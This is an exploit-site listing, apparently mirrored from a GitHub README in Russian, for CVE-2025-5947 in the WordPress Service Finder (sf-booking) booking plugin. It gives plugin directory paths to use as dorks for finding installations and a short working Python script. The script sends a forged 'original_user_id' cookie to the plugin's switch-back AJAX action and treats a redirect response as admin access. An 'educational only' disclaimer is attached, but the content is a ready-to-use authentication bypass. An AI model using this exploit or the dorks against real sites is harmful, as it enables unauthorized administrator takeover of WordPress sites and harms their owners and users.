Sploitus

CVE-2025-5947_Exploit

kitploit · 2026-09-03

Exploit Code

MARKDOWN65 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4RGS-CVE-2025-5947_EXPLOIT
# 🔍 Эксплойт плагина WordPress — Service Finder (sf-booking)

## Обзор

Плагин **Service Finder** — это система бронирования и управления услугами для WordPress.  
Из-за его популярности и сложности в некоторых версиях были обнаружены проблемы безопасности, связанные с **неаутентифицированными AJAX-эндпоинтами** или некорректным контролем доступа.

В этом README объясняется, как исследователи могут безопасно идентифицировать установки и следовать этическим практикам (dbr krk).

* * *

## Уязвимые WP-дорки

`/wp-content/plugins/service-finder/`

`/wp-content/plugins/service-finder-bookings/`

`/wp-content/plugins/sf-booking/`

* * *

## Порядок действий при эксплуатации

> ⚠️ **Отказ от ответственности:**  
>  Эти поиски предназначены **только** для **образовательных** и **исследовательских** целей. Не предпринимайте **несанкционированный** доступ или эксплуатацию.

root@kitploit:~
    
    
    import requests
    
    url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
    cookies = {
        'original_user_id': '1',
    }
    
    r = requests.get(url, cookies=cookies)
    print(r.status_code)
    print(r.text)
    

  * `300-399`: ✅ УЯЗВИМОСТЬ! Перенаправление в админ-панель как АДМИНИСТРАТОР
  * `400-499`: ⚠️ Ошибка клиента — запрос был недействительным или неавторизованным, не уязвимость



* * *

## Ссылки

  * База данных плагинов WPScan — https://wpscan.com/plugins/
  * Национальная база данных уязвимостей (NVD) — https://nvd.nist.gov/
  * OWASP — методы Google Dorking / разведки
  * Рекомендации по раскрытию информации HackerOne — https://www.hackerone.com/disclosure-guidelines



* * *

## Автор

**Taha Mounir**

* * *